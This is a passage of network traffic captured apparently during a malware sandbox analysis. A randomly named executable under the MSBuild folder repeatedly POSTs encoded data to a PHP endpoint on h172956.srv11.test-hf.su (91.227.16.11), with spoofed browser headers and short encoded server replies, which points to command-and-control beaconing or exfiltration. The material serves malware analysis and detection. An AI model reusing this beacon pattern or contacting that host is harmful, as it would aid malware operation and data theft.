                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:27.591542959 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:27.591830969 CET1872OUTData Raw: 51 5a 54 5d 5e 5c 55 57 5e 57 5a 51 57 5a 50 5f 54 57 54 53 56 58 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QZT]^\UW^WZQWZP_TWTSVXW^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;*$!]'!/=$((&);!<4U6? '2?.X,9%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:27.962852955 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 05 26 05 23 50 34 1d 02 16 29 04 25 07 3e 32 2d 07 2b 06 2a 05 2a 11 26 5f 2c 00 20 56 2b 38 20 18 23 06 28 52 36 0f 30 52 25 29 20 5c 05 11 27 59 30 1c 04 00 30 04 2e 04 27 57 2e 03 25 11 3f 45 2b 02 22 10 24 07 27 13 34 33 09 0a 25 2a 3f 13 27 01 2e 01 39 3e 3b 5f 25 2d 2d 54 02 17 22 13 27 5b 27 04 29 33 37 11 32 31 21 15 3d 3e 3f 0c 22 2a 23 0e 22 23 29 59 31 38 3e 16 36 54 20 03 28 5e 3f 1f 25 3c 20 51 31 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&#P4)%>2-+**&_, V+8 #(R60R%) \'Y00.'W.%?E+"$'43%*?'.9>;_%--T"'[')3721!=>?"*#"#)Y18>6T (^?%< Q1#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      51192.168.2.44979591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:27.367069960 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:27.707849979 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:27.708204031 CET2548OUTData Raw: 54 5d 51 5b 5e 5d 55 57 5e 57 5a 51 57 5e 50 5b 54 5d 54 5a 56 5c 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q[^]UW^WZQW^P[T]TZV\WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C8-$3058?6]&+<2)?545'Y0$,=/%Z"!Q*
                                                                                      Mar 6, 2024 09:53:28.076261044 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      52192.168.2.44979691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:28.549299002 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:28.898313046 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:28.898628950 CET2548OUTData Raw: 54 5d 51 5e 5b 59 55 54 5e 57 5a 51 57 5f 50 52 54 50 54 5f 56 5f 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q^[YUT^WZQW_PRTPT_V_WXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;!"T3$&X-/&Y&;$1'!;6<7Y&''Y2./%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:29.272958994 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      53192.168.2.44979791.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:29.745549917 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:30.088984966 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:30.089473009 CET2548OUTData Raw: 54 51 51 5a 5e 5b 55 51 5e 57 5a 51 57 5b 50 5f 54 54 54 5b 56 54 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQZ^[UQ^WZQW[P_TTT[VTWUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/0#:066^;%&;8&: T!4P5,&4<1,1/%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:30.460036039 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:30 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      54192.168.2.44979891.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:30.931688070 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:31.274828911 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:31.275105000 CET2548OUTData Raw: 54 59 54 5f 5b 58 50 57 5e 57 5a 51 57 51 50 59 54 55 54 5b 56 5b 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYT_[XPW^WZQWQPYTUT[V[WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:.1-$5^&6Y8='2!,'6,_$B$&&Y89%Z"!Q*
                                                                                      Mar 6, 2024 09:53:31.645950079 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:31 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      55192.168.2.44979991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:32.104346037 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:32.449577093 CET2544OUTData Raw: 54 51 51 5b 5b 5f 55 53 5e 57 5a 51 57 59 50 5d 54 57 54 52 56 5a 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ[[_US^WZQWYP]TWTRVZWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D82:V$#&'6;<=$^?Y16<!/#'?%)/9%Z"!Q*1
                                                                                      Mar 6, 2024 09:53:32.457506895 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:32.820734024 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      56192.168.2.44980091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:33.291979074 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:33.636048079 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:33.636344910 CET2548OUTData Raw: 54 51 54 5b 5b 58 50 53 5e 57 5a 51 57 5a 50 5f 54 55 54 53 56 5d 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQT[[XPS^WZQWZP_TUTSV]WTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;-%3!^&5"/"Y$ '98Q6/7#//]$$_2<9-9%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:34.008846045 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      57192.168.2.44980191.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:33.309796095 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:33.653975964 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:33.654211998 CET1872OUTData Raw: 54 5a 54 58 5b 5c 50 56 5e 57 5a 51 57 51 50 52 54 51 54 5f 56 5f 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TZTX[\PV^WZQWQPRTQT_V_WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@;*V' >'P:8/=0^$%("<?#?#Y$4;X1?=,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:34.025928020 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 05 26 05 24 0f 34 0d 0d 09 29 13 26 12 2a 21 2a 10 3f 28 25 5c 29 3c 2a 1b 2f 17 30 55 28 38 05 40 23 01 24 1a 22 08 24 54 27 39 20 5c 05 11 27 58 24 1c 04 02 26 3a 3e 03 27 08 29 5b 25 11 38 19 2a 38 32 1e 27 39 05 10 22 23 01 0a 26 5c 23 10 30 11 22 07 2e 2e 23 13 27 2d 2d 54 02 17 21 09 33 3d 3c 5b 3f 1e 27 1f 31 0b 39 14 29 3d 3f 0d 21 5f 37 0e 36 33 04 04 26 06 3d 01 21 22 09 59 3c 3b 23 5a 24 12 34 53 26 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&$4)&*!*?(%\)<*/0U(8@#$"$T'9 \'X$&:>')[%8*82'9"#&\#0"..#'--T!3=<[?'19)=?!_763&=!"Y<;#Z$4S&#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      58192.168.2.44980291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:34.477730989 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2544
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:34.818795919 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:34.819029093 CET2544OUTData Raw: 51 5c 54 5e 5b 5c 55 50 5e 57 5a 51 57 59 50 5a 54 51 54 59 56 5b 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q\T^[\UP^WZQWYPZTQTYV[W[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/W%'36']8^$;'Z&",?",X0'+1.Y,%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:35.191509962 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:35 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      59192.168.2.44980391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:35.651540995 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:35.996496916 CET2548OUTData Raw: 54 5d 51 5b 5b 5d 55 5c 5e 57 5a 51 57 5c 50 5f 54 52 54 53 56 58 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]Q[[]U\^WZQW\P_TRTSVXW]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9C;W$33;X'$136<;#,&$;%Z&8%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:36.001449108 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:36.369654894 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      60192.168.2.44980491.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:36.836982012 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:37.180258989 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:37.180792093 CET2548OUTData Raw: 51 5b 54 51 5e 5d 55 54 5e 57 5a 51 57 58 50 52 54 50 54 52 56 5a 57 54 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TQ^]UT^WZQWXPRTPTRVZWTQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;22W0#*$%:^;1'+,':$P"Z76?#X0 2>;%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:37.552112103 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:37 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      61192.168.2.44980591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:53:38.014337063 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:38.359524965 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:38.359833956 CET2548OUTData Raw: 51 5e 54 5f 5e 5c 55 53 5e 57 5a 51 57 5b 50 58 54 5c 54 5c 56 5d 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
